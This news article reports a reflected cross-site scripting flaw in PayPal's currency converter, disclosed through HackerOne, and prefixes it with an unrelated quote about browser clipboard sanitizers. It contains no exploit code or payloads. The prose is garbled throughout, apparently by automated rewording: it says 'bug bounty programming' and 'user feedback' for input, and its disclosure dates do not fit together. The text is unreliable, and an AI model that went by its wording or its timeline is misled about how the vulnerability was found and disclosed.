“This moves the responsibility for correct parsing into a piece of software that is already getting frequent security updates and has proven successful in doing it timely,” Braun said. According to Bentkowski, browsers already have built-in sanitizers for clipboard info, so repurposing the code to extend native sanitization capabilities makes perfect sense.

PayPal Suffered Cross-Site Scripting -XSS Vulnerability

 

The PayPal currency converter functionality was damaged by severe cross-site scripting (XSS) vulnerability. An attacker might be able to run destructive scripts if the vulnerability is abused. This could lead to the malicious user injecting malicious JavaScript, HTML, or some other form of browser file. The bug was noticed on PayPal's web domain with the currency converter functionality of PayPal wallets. 

On February 19, 2020, the vulnerability was first identified as a concern of "reflected XSS and CSP bypass" by a security researcher who goes by the name "Cr33pb0y" – he's been granted $2,900 in bug bounty programming by HackerOne. 

PayPal said that a flaw occurred in the currency conversion endpoint which was triggered by an inability to adequately sanitize user feedback, in a restricted disclosure that was released on February 10 – almost a year after the researcher identified the problem privately. 

PayPal acknowledged the flaw- in response to the HackerOne forum, that contributed to the currency translation URL managing user feedback inappropriately. A vulnerability intruder may use the JavaScript injection to access a document object in a browser or apply other malicious code to the URL. If hackers load a malicious payload into the browser of a victim, they can steal data or use the computer to take control of the system. As a consequence, malicious payloads can trigger a victim's browser page without its knowledge or consent in the Document Object Model (DOM). 

Typically, XSS attacks represent a browser's script from a specific website and can enable a target to click a malicious connection. Payloads can be used as a theft point in larger attacks or for the stealing of cookies, session tokens, or account information. PayPal has now carried out further validation tests to monitor users’ feedback in the currency exchange function and wipe out errors following the disclosure of the bug bounty hunter. 

XSS bugs are a frequent hacker attack vector. Several recent leaks of data have been related to bugs like what some analysts claim is an XSS flaw. 

While telling that the vulnerability has been fixed, PayPal said, “by implementing additional controls to validate and sanitize user input before being returned in the response.”